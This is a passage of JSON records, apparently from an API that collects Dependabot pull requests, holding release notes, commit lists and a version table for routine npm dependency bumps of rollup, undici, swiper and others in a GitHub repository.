(\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6279\"\u003e#6279\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6279\"\u003e#6279\u003c/a\u003e: feat: external only Source Phase imports support (\u003ca href=\"https://github.com/guybedford\"\u003e\u003ccode\u003e@​guybedford\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.59.1\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-03-21\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix a crash when using lazy dynamic imports with moduleSideEffects:false (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6306\"\u003e#6306\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePull Requests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6281\"\u003e#6281\u003c/a\u003e: fix(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6282\"\u003e#6282\u003c/a\u003e: chore(deps): update github artifact actions (major) (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6283\"\u003e#6283\u003c/a\u003e: chore(deps): update dependency nyc to v18 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6284\"\u003e#6284\u003c/a\u003e: fix(deps): update swc monorepo (major) (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6285\"\u003e#6285\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6290\"\u003e#6290\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot], \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6291\"\u003e#6291\u003c/a\u003e: chore(deps): update dependency \u003ccode\u003e@​shikijs/vitepress-twoslash\u003c/code\u003e to v4 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6292\"\u003e#6292\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6297\"\u003e#6297\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6298\"\u003e#6298\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6299\"\u003e#6299\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6300\"\u003e#6300\u003c/a\u003e: docs: update packagephobia link (\u003ca href=\"https://github.com/bluwy\"\u003e\u003ccode\u003e@​bluwy\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6301\"\u003e#6301\u003c/a\u003e: chore(deps): update dependency lint-staged to ^16.3.3 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6306\"\u003e#6306\u003c/a\u003e: fix: fix chunk assignment for deoptimized module with dynamic import (\u003ca href=\"https://github.com/JoaoBrlt\"\u003e\u003ccode\u003e@​JoaoBrlt\u003c/code\u003e\u003c/a\u003e, \u003ca href=\"https://github.com/lukastaegert\"\u003e\u003ccode\u003e@​lukastaegert\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6307\"\u003e#6307\u003c/a\u003e: chore(deps): update minor/patch updates (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6308\"\u003e#6308\u003c/a\u003e: chore(deps): update dependency lru-cache to v11 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6309\"\u003e#6309\u003c/a\u003e: chore(deps): update dependency vite to v8 (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6310\"\u003e#6310\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6311\"\u003e#6311\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/rollup/rollup/pull/6312\"\u003e#6312\u003c/a\u003e: chore(deps): lock file maintenance (\u003ca href=\"https://github.com/renovate\"\u003e\u003ccode\u003e@​renovate\u003c/code\u003e\u003c/a\u003e[bot])\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.59.0\u003c/h2\u003e\n\u003cp\u003e\u003cem\u003e2026-02-22\u003c/em\u003e\u003c/p\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eThrow when the generated bundle contains paths that would leave the output directory (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6276\"\u003e#6276\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/6ecd69fb2ce736c8aabb50829edd227d1792c957\"\u003e\u003ccode\u003e6ecd69f\u003c/code\u003e\u003c/a\u003e 4.60.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/6b725b9f0aae80e4ca4bf3e7b9763b153b850d8b\"\u003e\u003ccode\u003e6b725b9\u003c/code\u003e\u003c/a\u003e feat: external only Source Phase imports support (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6279\"\u003e#6279\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/0cba9e079e1d6e56882558827b37557f36c52966\"\u003e\u003ccode\u003e0cba9e0\u003c/code\u003e\u003c/a\u003e 4.59.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/4eeea29bd42b6abf3dad53b760f53750cd698872\"\u003e\u003ccode\u003e4eeea29\u003c/code\u003e\u003c/a\u003e Pin Vite\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/1cd49ae2a2a3de50627e2790b17e3c8704012626\"\u003e\u003ccode\u003e1cd49ae\u003c/code\u003e\u003c/a\u003e fix: fix chunk assignment for deoptimized module with dynamic import (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6306\"\u003e#6306\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/c9dabc3744b5316a1a08c85b65fce73d465e5453\"\u003e\u003ccode\u003ec9dabc3\u003c/code\u003e\u003c/a\u003e Downgrade Vite\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/d46200fd92b083d0997c0216a21f5bcdc5e6efea\"\u003e\u003ccode\u003ed46200f\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency vite to v8 (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6309\"\u003e#6309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/aa6c853da554cd8b56b48e94fcfc21a5b027b271\"\u003e\u003ccode\u003eaa6c853\u003c/code\u003e\u003c/a\u003e chore(deps): update dependency lru-cache to v11 (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6308\"\u003e#6308\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/4208811aa6600f81d94a746a01bd0ff861718578\"\u003e\u003ccode\u003e4208811\u003c/code\u003e\u003c/a\u003e chore(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6312\"\u003e#6312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rollup/rollup/commit/5348a82cee5e07a39164fb78ce9d69bfc557d341\"\u003e\u003ccode\u003e5348a82\u003c/code\u003e\u003c/a\u003e chore(deps): lock file maintenance (\u003ca href=\"https://redirect.github.com/rollup/rollup/issues/6311\"\u003e#6311\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/rollup/rollup/compare/v4.21.0...v4.60.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for rollup since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `undici` from 5.28.3 to 5.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodejs/undici/releases\"\u003eundici's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.29.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix tests in v5.x for Node 20 by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nodejs/undici/pull/4104\"\u003enodejs/undici#4104\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved clients with unrecoverable errors from the Pool \u003ca href=\"https://redirect.github.com/nodejs/undici/pull/4088\"\u003enodejs/undici#4088\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.5...v5.29.0\"\u003ehttps://github.com/nodejs/undici/compare/v5.28.5...v5.29.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.28.5\u003c/h2\u003e\n\u003ch1\u003e⚠️ Security Release ⚠️\u003c/h1\u003e\n\u003cp\u003eFixes CVE CVE-2025-22150 \u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975\"\u003ehttps://github.com/nodejs/undici/security/advisories/GHSA-c76h-2ccp-4975\u003c/a\u003e (embargoed until 22-01-2025).\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.4...v5.28.5\"\u003ehttps://github.com/nodejs/undici/compare/v5.28.4...v5.28.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.28.4\u003c/h2\u003e\n\u003ch2\u003e:warning: Security Release :warning:\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7\"\u003ehttps://github.com/nodejs/undici/security/advisories/GHSA-m4v8-wqvr-p9f7\u003c/a\u003e CVE-2024-30260\u003c/li\u003e\n\u003cli\u003eFixes \u003ca href=\"https://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672\"\u003ehttps://github.com/nodejs/undici/security/advisories/GHSA-9qxr-qj54-h672\u003c/a\u003e CVE-2024-30261\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.3...v5.28.4\"\u003ehttps://github.com/nodejs/undici/compare/v5.28.3...v5.28.4\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/9528f6853a72a637823e863f1dd12ec47a3fc9e7\"\u003e\u003ccode\u003e9528f68\u003c/code\u003e\u003c/a\u003e Bumped v5.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/f1d75a4e107866110c48003f00e5d0de52ef2cce\"\u003e\u003ccode\u003ef1d75a4\u003c/code\u003e\u003c/a\u003e increase timeout for redirect test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/2d31ed61f7ca12ef6d89a323dc236346364ac379\"\u003e\u003ccode\u003e2d31ed6\u003c/code\u003e\u003c/a\u003e remove fuzzing tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/6b36d49cb2fa14217baa11b6fd27ee20b661ea4c\"\u003e\u003ccode\u003e6b36d49\u003c/code\u003e\u003c/a\u003e fix redirect test in Node v16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/648dd8f7ba3654db09a095361a167e3576db8cd0\"\u003e\u003ccode\u003e648dd8f\u003c/code\u003e\u003c/a\u003e more fix for the wpt runner on Windows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/a0516bae59b6aa8aa8124f9ae5cfed79541d10e2\"\u003e\u003ccode\u003ea0516ba\u003c/code\u003e\u003c/a\u003e don't use internal header state for cookies (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/3295\"\u003e#3295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/87ce4af0e58657506cedb2d07a5ba24f964b733f\"\u003e\u003ccode\u003e87ce4af\u003c/code\u003e\u003c/a\u003e fix test/client for node 20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/c2c8fd55b778267ad8b2e9ee04218c038a5d02af\"\u003e\u003ccode\u003ec2c8fd5\u003c/code\u003e\u003c/a\u003e fix: accept v20 SSL specific error for alpn selection in http/2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/82200bd10b7073ac235f8fc48d4daa82b350cd4c\"\u003e\u003ccode\u003e82200bd\u003c/code\u003e\u003c/a\u003e [v6.x] fix wpts on windows (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/4093\"\u003e#4093\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodejs/undici/commit/47546fa68d04eec5b96ab93225c3bc08b77cd94f\"\u003e\u003ccode\u003e47546fa\u003c/code\u003e\u003c/a\u003e test: fix windows wpt (\u003ca href=\"https://redirect.github.com/nodejs/undici/issues/4050\"\u003e#4050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/nodejs/undici/compare/v5.28.3...v5.29.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/joelvaneenwyk/gh-action-setup-env/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/joelvaneenwyk/gh-action-setup-env/pull/27","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/joelvaneenwyk%2Fgh-action-setup-env/issues/27","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/27/packages"}},{"old_version":"9.2.1","new_version":"9.2.2","update_type":"patch","path":null,"pr_created_at":"2026-03-25T17:39:37.000Z","version_change":"9.2.1 → 9.2.2","issue":{"uuid":"4137242295","node_id":"PR_kwDODZOtbM7NbmAX","number":164,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 1 directory with 22 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":["polaroidkidd"],"locked":false,"comments_count":2,"pull_request":true,"closed_at":"2026-04-13T10:29:38.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-25T17:39:37.000Z","updated_at":"2026-04-13T10:29:46.000Z","time_to_close":1615801,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":22,"packages":[{"name":"swiper","old_version":"11.1.0","new_version":"12.1.2","repository_url":"https://github.com/nolimits4web/Swiper"},{"name":"svelte","old_version":"4.2.12","new_version":"5.53.5","repository_url":"https://github.com/sveltejs/svelte"},{"name":"sveltekit-superforms","old_version":"1.13.4","new_version":"2.27.4","repository_url":"https://github.com/ciscoheat/sveltekit-superforms"},{"name":"@octokit/endpoint","old_version":"9.0.5","new_version":"9.0.6","repository_url":"https://github.com/octokit/endpoint.js"},{"name":"@octokit/plugin-paginate-rest","old_version":"9.2.1","new_version":"9.2.2","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request-error","old_version":"5.1.0","new_version":"5.1.1","repository_url":"https://github.com/octokit/request-error.js"},{"name":"@octokit/request","old_version":"8.3.1","new_version":"8.4.1","repository_url":"https://github.com/octokit/request.js"},{"name":"ajv","old_version":"6.12.6","new_version":"6.14.0","repository_url":"https://github.com/ajv-validator/ajv"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.12","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"braces","old_version":"3.0.2","new_version":"3.0.3","repository_url":"https://github.com/micromatch/braces"},{"name":"cross-spawn","old_version":"7.0.3","new_version":"7.0.6","repository_url":"https://github.com/moxystudio/node-cross-spawn"},{"name":"diff","old_version":"5.2.0","new_version":"5.2.2","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.3.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"immutable","old_version":"4.3.5","new_version":"4.3.8","repository_url":"https://github.com/immutable-js/immutable-js"},{"name":"js-yaml","old_version":"4.1.0","new_version":"4.1.1","repository_url":"https://github.com/nodeca/js-yaml"},{"name":"jws","old_version":"3.2.2","new_version":"3.2.3","repository_url":"https://github.com/brianloveswords/node-jws"},{"name":"lodash","old_version":"4.17.21","new_version":"4.17.23","repository_url":"https://github.com/lodash/lodash"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"nanoid","old_version":"3.3.7","new_version":"3.3.11","repository_url":"https://github.com/ai/nanoid"},{"name":"rollup","old_version":"4.14.1","new_version":"4.60.0","repository_url":"https://github.com/rollup/rollup"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 20 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [swiper](https://github.com/nolimits4web/Swiper) | `11.1.0` | `12.1.2` |\n| [svelte](https://github.com/sveltejs/svelte/tree/HEAD/packages/svelte) | `4.2.12` | `5.53.5` |\n| [sveltekit-superforms](https://github.com/ciscoheat/sveltekit-superforms) | `1.13.4` | `2.27.4` |\n| [@octokit/endpoint](https://github.com/octokit/endpoint.js) | `9.0.5` | `9.0.6` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `9.2.1` | `9.2.2` |\n| [@octokit/request-error](https://github.com/octokit/request-error.js) | `5.1.0` | `5.1.1` |\n| [@octokit/request](https://github.com/octokit/request.js) | `8.3.1` | `8.4.1` |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.12` |\n| [braces](https://github.com/micromatch/braces) | `3.0.2` | `3.0.3` |\n| [cross-spawn](https://github.com/moxystudio/node-cross-spawn) | `7.0.3` | `7.0.6` |\n| [diff](https://github.com/kpdecker/jsdiff) | `5.2.0` | `5.2.2` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.1` | `3.4.2` |\n| [immutable](https://github.com/immutable-js/immutable-js) | `4.3.5` | `4.3.8` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `4.1.0` | `4.1.1` |\n| [jws](https://github.com/brianloveswords/node-jws) | `3.2.2` | `3.2.3` |\n| [lodash](https://github.com/lodash/lodash) | `4.17.21` | `4.17.23` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [nanoid](https://github.com/ai/nanoid) | `3.3.7` | `3.3.11` |\n| [rollup](https://github.com/rollup/rollup) | `4.14.1` | `4.60.0` |\n\n\nUpdates `swiper` from 11.1.0 to 12.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nolimits4web/Swiper/releases\"\u003eswiper's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev12.1.2\u003c/h2\u003e\n\u003cp\u003eNo release notes provided.\u003c/p\u003e\n\u003ch2\u003ev12.1.1\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ea11y:\u003c/strong\u003e fix focus in virtual mode enabled (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/30550088fd089600aec2d7f8924b88cff13abbe9\"\u003e3055008\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8147\"\u003e#8147\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e avoid double-subtracting offsets in centerInsufficientSlides (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8158\"\u003e#8158\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/60b005222a801029a4a00d319517028afba7af18\"\u003e60b0052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e prevent duplicate module initialization in constructor (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8155\"\u003e#8155\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8156\"\u003e#8156\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/07738a233b70535c36126c5b579f2bb40049da6c\"\u003e07738a2\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003etypes:\u003c/strong\u003e support boolean as a11y value (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8157\"\u003e#8157\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/6bf76d573196c61db1328350c11e2c44f5d3ec08\"\u003e6bf76d5\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev12.1.0\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eautoplay:\u003c/strong\u003e broken custom delay percentages with pause/resume (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8133\"\u003e#8133\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/0afecde9781268a60a92f752ea3a3a92420e2dcf\"\u003e0afecde\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e Don't use \u003ccode\u003edata-swiper-slide-index\u003c/code\u003e for \u003ccode\u003erealIndex\u003c/code\u003e when virtual module is enabled (\u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8142\"\u003e#8142\u003c/a\u003e) (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/bd957f8396f711b83dc1bc6b3d42a59e6d6539d2\"\u003ebd957f8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e Escape all CSS selector special characters (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/d35f41a85bd1793de58358d06300440e09187a6d\"\u003ed35f41a\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/8135\"\u003e#8135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ecore:\u003c/strong\u003e support slidesOffsetBefore and slidesOffsetAfert in cssMode (\u003ca href=\"https://github.com/nolimits4web/Swiper/commit/45b98d02b2235b0c425f8bd60ebdc04d7b1a4fbd\"\u003e45b98d0\u003c/a\u003e), closes \u003ca href=\"https://redirect.github.com/nolimits4web/Swiper/issues/7926\"\u003e#7926\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix lazy preloader removal error in react in vue (\u003ca 